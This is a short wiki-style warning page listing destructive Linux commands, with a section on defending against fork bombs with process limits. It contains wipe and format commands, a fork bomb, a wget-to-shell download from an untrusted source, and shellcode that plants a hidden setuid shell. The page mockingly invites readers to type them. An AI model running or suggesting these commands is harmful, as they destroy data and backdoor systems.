====== This is EVIL code ====== **YOU HAVE BEEN WARNED!** If you do not understand what commands below do .. please run run far away with out using it. But if you **DO understand** this warning .. just type one of the fallowing commands in your CLI rm -rf / char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"; mkfs.ext3 /dev/sda :(){:|:&};: **DEFENDING AGAINST THE ATTACK (forkbomb attack)** \\ \\ This is very easy to defend against. All you need to do is set limits to the number of processes that a user can open. These can be set per user, per group or globally. And you can set this one of two ways. You can use the ulimit command for instant change that only lasts until the user logs off, or make the change permanent by editing the /etc/security/limits.conf file. To use the ulimit command simply type “ulimit -u” with the number of processes that you want users to be allowed to run. So to set the limit to 512 just type: sudo ulimit -u 512 You can also change the ''/etc/security/limits.conf'' file to make the change permanent. Full instructions can be found on AskUbuntu.com, but basically just add the following line to the config file: * hard nproc 512 The “*” means apply the change to everyone, “Hard” means it is a hard limit, and “nproc 512″ locks the number of processes to 512. You need to adjust the number of processes to a number that would be the best setting for your system. 512 seemed to work great on mine. Don’t set the number to low, or you may have other “denial of service” type issues, lol. more: http://www.infosecisland.com/blogview/22745-An-Eleven-Character-Linux-Denial-of-Service-Attack-amp-How-to-Defend-Against-it.html any_command > /dev/sda wget http://some_untrusted_source -O- | sh mv /home/yourhomedirectory/* /dev/null